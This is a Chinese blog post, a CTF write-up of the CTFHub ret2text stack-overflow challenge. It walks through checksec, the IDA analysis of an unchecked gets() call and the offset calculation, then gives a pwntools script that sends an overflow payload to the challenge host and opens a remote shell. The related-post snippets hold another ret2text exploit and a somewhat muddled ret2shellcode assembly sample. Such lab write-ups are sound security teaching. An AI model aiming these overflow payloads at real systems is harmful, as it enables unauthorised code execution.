PWN做题笔记1-ret2text(已校对)

已于 2023-03-11 17:51:00 修改
阅读量3.2k 收藏 10
点赞数 4
文章标签: 系统安全
于 2022-04-19 15:24:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40923256/article/details/124274566
版权

原题位置:CTFHub

题目属于栈溢出

给出了地址和端口,压缩包中有一个二进制程序pwn

file pwn可以看到是64位ELF程序

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

checksec发现没有开启地址空间随机化

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_17,color_FFFFFF,t_70,g_se,x_16

程序运行如下:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_14,color_FFFFFF,t_70,g_se,x_16

 ida64反汇编,发现gets输入没有边界检查0x70,存在注入

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_16,color_FFFFFF,t_70,g_se,x_16

secure函数调用了system返回一个服务器里的shell,因此目标是调用这个函数

 watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_8,color_FFFFFF,t_70,g_se,x_16

 函数地址如下:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_14,color_FFFFFF,t_70,g_se,x_16

 main函数栈帧中输入存放在相对ebp 0x70的位置:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_11,color_FFFFFF,t_70,g_se,x_16

 目标是覆盖tmain存储下一指令的位置,地址偏移除了0x70还要约过存放tmain的ebp的一个单元,即再+8,下一指令覆盖为0x4007B8

因此输入:b'A' * 0x78 + p64(0x4007b8)

 同pwntools编写脚本:

from pwn import *
host = 'challenge-ff699f909c1e3503.sandbox.ctfhub.com'
port = 37126

p = connect(host, port)
payload = b'A' * 0x78 + p64(0x4007b8)
p.sendline(payload)
p.interactive()

运行获取了服务器中的shell,ls发现flag文件,cat获取flag

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_14,color_FFFFFF,t_70,g_se,x_16

 

 

 

_alpaca_
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ROP初探之ret2text
chlet的博客
05-05 495
ROP即返回导向编程是一种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。这些gadgets串联在一起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。
main(), _tmain(), wmain(), wWinMain(), _tWinMain()的区别
u012903741的博客
07-14 7870
在C/C++编程中,最常见的就是main()函数,这是应用程序的入口,那么 _tmain(), wmain(), wWinMain(), _tWinMain()这些函数又是什么呢?   _tmain()是个宏,它需要头文件#include “stdafx.h”的支持,因为头文件stdafx.h中包含了头文件tchar.h,在头文件tchar.h里,微软做了以下宏定义 #ifd
PWN初体验之ret2text
weixin_43137410的博客
08-04 663
"Hello,World!"的浪漫可能只有直男才懂!
基础ROP之:ret2text,ret2libc,ret2syscall,ret2shellcode
最新发布
WdIg-2023的博客
01-30 1056
在上一篇文章中学习了gdb和pwntools的基本使用后,这篇文章来带领大家入门pwn,包括:ret2text,ret2libc,ret2syscall,ret2shellcode。
pwn入门题目汇总.rar
09-01
pwn入门题目汇总.rar
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
ret2libc2pwn 入门题
02-11
pwn 入门题
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1276
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)
小哈里的博客
01-12 5491
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
入门到放弃系列 ret2text2
weixin_43489686的博客
09-11 550
ret2text2 这道题依然是入门级别的题目,比上一道题目略难一点,主要区别在于这个题目没有直接给出的后门函数,也就是system函数参数不是/bin/sh,需要自己构造个shell。 首先还是一样先看看这个程序的逻辑,发现这个程序会复述你输入的语句。然后再分别gdb和拖入ida。 main函数点进function里发现逻辑没问题,也有很明显的栈溢出漏洞,其中总偏移量为0x10+8=0x18...
pwn基础之ctfwiki-栈溢出-基本ROP-ret2text
qq_52658640的博客
04-21 987
文章目录前言原理ret2text发现漏洞利用漏洞书写exp总结 前言 刚开始自己的二进制生涯,想记录一下自己的学习,如有错误还请大佬们斧正。 原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 ret2tex
pwn刷题num33---ret2text
tbsqigongzi的博客
04-28 309
BUUCTF-PWN- [HarekazeCTF2019]baby_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
pwn栈溢出学习 基本ROP——ret2text
MrTreebook的博客
10-31 338
CTFWiki 栈溢出 ret2text 目录CTFWiki 栈溢出 ret2text1.checksec跑一下2.IDA pro看一下2.1 计算s相对ebp的偏移量2.2 看一下system函数3.gdb动态调试获取覆盖数据大小4.编写exp 1.checksec跑一下 NX enable :栈不可执行 对于这个题目来说执不执行都无所谓 2.IDA pro看一下 2.1 计算s相对ebp的偏移量 看到一个危险函数 gets() 看到[esp + 1ch] [ebp - 64h] 这个时候我们要
ret2text学习笔记 --- PWN入门题目
xindada559的博客
06-09 454
最近学习了B站上的有关PWN的入门视频课,简单写点笔记,学习一下叭 先上下学习链接,大佬讲的很细致,多听两遍总没坏处。 XMCVE 2020 CTF Pwn入门课程 shouxian
PWN】05.ret2text
weixin_52553215的博客
03-27 496
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。通过栈溢出修改栈上的返回地址,这样cpu执行ret指令的时候,就会将被修改的值从栈上取出放入eip寄存器中,紧接着执行eip所指向的位置的指令,这样就相当于控制了程序的执行流。
pwn刷题num28---ret2text
tbsqigongzi的博客
04-27 269
BUUCTF-PWN- jarvisoj_level2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 看一下 vulnerable_function();函数 栈溢出,read函数读入0x100字节放在buf处,而buf只有0x88字节大小,可以覆盖返回地
ret2shellcode 64位怎么编写
03-25
在64位的ret2shellcode攻击中,需要使用RIP来控制程序的执行流程,而不是使用EIP。因此,需要在shellcode中构造64位的地址来覆盖RIP寄存器。 一般来说,ret2shellcode需要满足以下条件: 1. 执行栈溢出,覆盖返回地址的同时,还要在溢出数据中注入shellcode。 2. 执行栈溢出时需要找到距离返回地址的偏移量。 3. shellcode需要在堆栈中执行。 下面是一份64位ret2shellcode的示例代码: ```assembly section .text global _start _start: ; 执行栈溢出,将shellcode注入到栈中。 ; 使用msfvenom生成一段简单的execve("/bin/sh")代码 ; msfvenom -a x64 --platform linux -p linux/x64/exec CMD=/bin/sh -f c ; 将生成的shellcode粘贴到这里。 xor esi, esi mov eax, esi ; 将堆栈指针rsp保存到rbx中 mov rbx, rsp next: ; 在栈中查找返回地址的偏移量 ; 这里的偏移量为40,实际上需要根据目标二进制文件的不同而调整 cmp byte [rsp], 0 jne next add rsp, 40 ; 用shellcode的地址覆盖返回地址 ; 这里的地址也需要根据目标二进制文件的不同而调整 mov QWORD [rsp], 0x7fffffffde10 ; 跳转到shellcode的地址,开始执行 jmp rbx ``` 在这个示例中,我们将用msfvenom生成一个简单的execve("/bin/sh")的shellcode,该shellcode将在栈上执行。然后,我们将查询堆栈来计算返回地址距离堆栈指针的偏移量,并手动向该返回地址写入shell代码的地址。最后,我们将跳转回堆栈指针的位置,开始执行我们的shellcode。 需要注意的是,在实际攻击中,偏移量和地址值可能因目标程序的不同而有所变化。因此,需要针对目标程序进行适当的调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值